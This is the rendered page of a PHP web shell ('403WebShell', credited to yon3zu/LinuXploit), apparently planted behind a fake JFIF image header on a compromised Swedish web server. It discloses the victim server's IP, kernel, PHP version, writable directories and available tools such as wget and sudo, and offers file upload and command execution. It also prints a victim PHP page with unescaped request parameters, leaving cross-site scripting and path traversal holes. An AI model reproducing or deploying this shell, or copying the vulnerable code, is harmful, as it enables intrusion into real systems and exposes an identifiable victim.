????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.25
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.se/fi2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.astacus.se/fi2/edit.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252" />
<title>Upload Fi2 Value and Class Lists</title>
<style type="text/css">
.text {
	font-family: Verdana, Geneva, sans-serif;
	font-size: 18px;
	font-weight: bold;
}
.text #form1 br {
	font-family: sss;
}
</style>
<script>
function deleteFile(name){
	
	var del = confirm("Do you really want to delete the file?");
	if (del == true) {
		document.location.href = "del.php?file="+name+"&customerid="+<?php echo($_GET['customerid'])?>+"&type=<?php echo($_GET['type'])?>";	
	}

}
</script>
</head>

<body><?php if($_GET['page'] == "fi2admin"){?>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td class="text"><p>Upload Fi2 Value and Class Lists</p>
      <form id="form1" name="form1" method="post" action="upload.php" enctype="multipart/form-data">
        <a href="edit.php?page=fi2admin&amp;customerid=<?php echo($_GET['customerid'])?>&amp;type=classlists">Class Lists</a><br />
        <br />
        <a href="edit.php?page=fi2admin&amp;customerid=<?php echo($_GET['customerid'])?>&amp;type=valuelists">Value Lists</a>
      </form>
    <p>
      <?php if($_GET['type'] != ""){?>
    <table width="800" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="350">Filename:</td>
    <td width="350">Date:</td>
    <td width="100">&nbsp;</td>
  </tr>
</table>

<?php 

$target_dir = "/var/www/www.astacus.se/fi2/".$_GET['type']."/". $_GET['customerid']."/";


if ($handle = opendir($target_dir)) {

    while (false !== ($entry = readdir($handle))) {

        if ($entry != "." && $entry != "..") {

           

?>
    <table width="800" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="350"><?php echo($entry);?></td>
        <td width="350"><?php echo(date ("Y-d-m H:i:s", filemtime($target_dir."/".$entry)));?></td>
        <td width="100"><a href="#" onclick="deleteFile('<?php echo($target_dir."/".$entry);?>');">DELETE</a></td>
      </tr>
  </table>
    <?php
            }
    }

    closedir($handle);
}
	
	?>
    <?php }?>
    </p></td>
  </tr>
</table>
<?php }?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit